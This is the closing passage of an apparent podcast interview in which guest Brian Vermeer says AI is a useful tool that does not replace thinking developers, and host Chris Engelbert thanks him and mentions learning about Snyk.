Brian Vermeer: Oh, definitely, definitely. It's a lot of fun to play with, and it's also a great tool. But you should know that, first of all, it doesn't replace developers that think. Thinking is still something an AI doesn't do.

Chris Engelbert: All right, thank you very much. Time is over; 20 minutes is always super short, but it's supposed to be that way. So, Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk, because I hadn't looked into it for a couple of years. So yeah, thank you very much. And for the audience: I hope you're listening next week. New guest, new show episode, and we're going to see you again.
